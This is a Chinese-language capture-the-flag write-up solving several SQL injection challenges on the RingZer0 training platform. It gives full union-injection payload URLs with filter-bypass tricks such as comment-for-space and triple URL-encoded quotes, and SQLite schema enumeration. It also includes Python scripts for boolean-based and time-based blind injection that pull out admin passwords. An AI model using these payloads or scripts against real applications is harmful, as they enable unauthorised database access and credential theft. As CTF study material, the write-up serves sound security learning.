-sql 注入篇 :
Quote of the day --有回显,尝试union 注入。 发现过滤了空格。 用 /**/ 或%0a
https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,database()
得出 当前数据库为 sqli_quote
https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=0x73716c695f71756f7465)
得出 Quote of the day: alkdjf4iu,quotes
https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x616c6b646a66346975)
得出列 Quote of the day: id,flag
https://ringzer0team.com/challenges/37?q=8/**/union/**/select/**/1,(select/**/flag/**/from/**/alkdjf4iu/**/limit/**/0,1)
得出 flag Quote of the day: FLAG-bB6294R6cmLUlAu6H71sTd2J
=====
Thinking outside the box is the key 可以看出是sqlite 的union 注入。 下面的语句显示sqlite 版本号 。
https://ringzer0team.com/challenges/39/?id=3 union select 1,sqlite_version() #
https://ringzer0team.com/challenges/39/?id=3%20union%20select%201,(select%20name%20from%20sqlite_master%20limit%200,1)%20#
https://ringzer0team.com/challenges/39/?id=3 union select 1,(select group_concat(tbl_name) from sqlite_master where type='table')
猜表名字 , random_stuff,ajklshfajks,troll,aatroll
https://ringzer0team.com/challenges/39/?id=3 union select 1,(select group_concat(sql) from sqlite_master where name='ajklshfajks')
CREATE TABLE ajklshfajks (flag varchar(40))
https://ringzer0team.com/challenges/39/?id=3 union select 1,(select flag from ajklshfajks limit 0,1 )
FLAG-13lIBUTHNFLEprz2KKMx6yqV
=============
When it's lite it's not necessarily easy
输入 admin ,1 ,提示Invalid username / password.
输入1,1 ,提示No user found.。
猜测,其先判断了用户名,如果根据用户名能查到,则继续比较密码。
故为常见的 布尔盲注。
payload :
password=1&username=1' or ('4'='5') and 'a'='a , 提示 No user found
password=1&username=1' or ('4'='4') and 'a'='a , 提示 Invalid username / password
换句话说,只要 '4'='4' 这个语句正确,则提示 Invalid username / password。
python 脚本。
import requests
import string
url = "https://ringzer0team.com/challenges/19"
cookie = {
"PHPSESSID":"q9k4np79r1uf4fuss3lt0lreh1",
"_ga":"GA1.2.884720986.1529671391",
"_gid":"GA1.2.884720986.1529671391"
}
flag = ""
for i in range(1,10):
print "i:",i
for j in "0123456789" + string.letters + "-_!@#$^&*()={}":
data = {
"username": "1' or (substr((select password from users where username='admin'),%s,1)='%s') and 'a'='a" % (i, j),
# "username": "1' or (substr((select password from users where username ='admin' limit 0,1),1,1)='4') and 'a'='a",
"password":"1" #4dm1nzP455
}
r = requests.post(data=data,url=url,cookies=cookie)
if "Invalid username / password" in r.content:
flag += j
print flag
break
No more hacking for me!
根据源码<!-- l33t dev comment: -->
<!-- No more hacking attempt we implemented the MOST secure filter -->
<!-- urldecode(addslashes(str_replace("'", "", urldecode(htmlspecialchars($_GET['id'], ENT_QUOTES))))) -->
可以看出 ' 进行了过滤。
加上浏览器本身的url 解码,则共三次解码。
对 单引号进行三次编码,得出 %25252
尝试 联合注入,发现共有三列。
https://ringzer0team.com/challenges/74/?id=1 %252527 union select 1,2,3--
回显 2.
故枚举。
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,tbl_name,3 FROM sqlite_master WHERE type=%252527table%252527 limit 0,1 --
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,sql,3 FROM sqlite_master WHERE type=%252527table%252527 and tbl_name=%252527random_data%252527 limit 0,1 --
random_data CREATE TABLE random_data (id int, message varchar(50), display int)
http://ringzer0team.com/challenges/74/?id=0%252527 union all select 1,message,3 FROM random_data limit 2,1 --
注意 为什么sqlite 的枚举是这样写的,还需要继续研究。
=============
Login portal 4
时间盲注:
import requests
url = "https://ringzer0team.com/challenges/6"
cookie = {
"PHPSESSID":"vtqgjp8amva1fsr6eolee70af4",
"_ga":"GA1.2.1724649637.1519735081",
"_gid":"GA1.2.933125333.1519735081",
"_gat":"1"
}
flag = ""
for i in range(1,1000):
for j in range(33,127):
print "i:", i,"j:",j
data = {
"username":"1' || if((ascii(substr((select password from users limit 0,1),%s,1))=%s),sleep(3),1) || '"%(i,j),
"password":"1"
}
try:
r = requests.post(url=url,data=data,cookies=cookie,timeout=2.5)
except:
flag += chr(j)
print flag
break
代码有几点说明:
1. 为什么用ascii 比较,而不是直接字符串比较, 是因为mysql 字符串不区分大小写。
2. || 而不是or ,根据验证猜测是后台屏蔽了。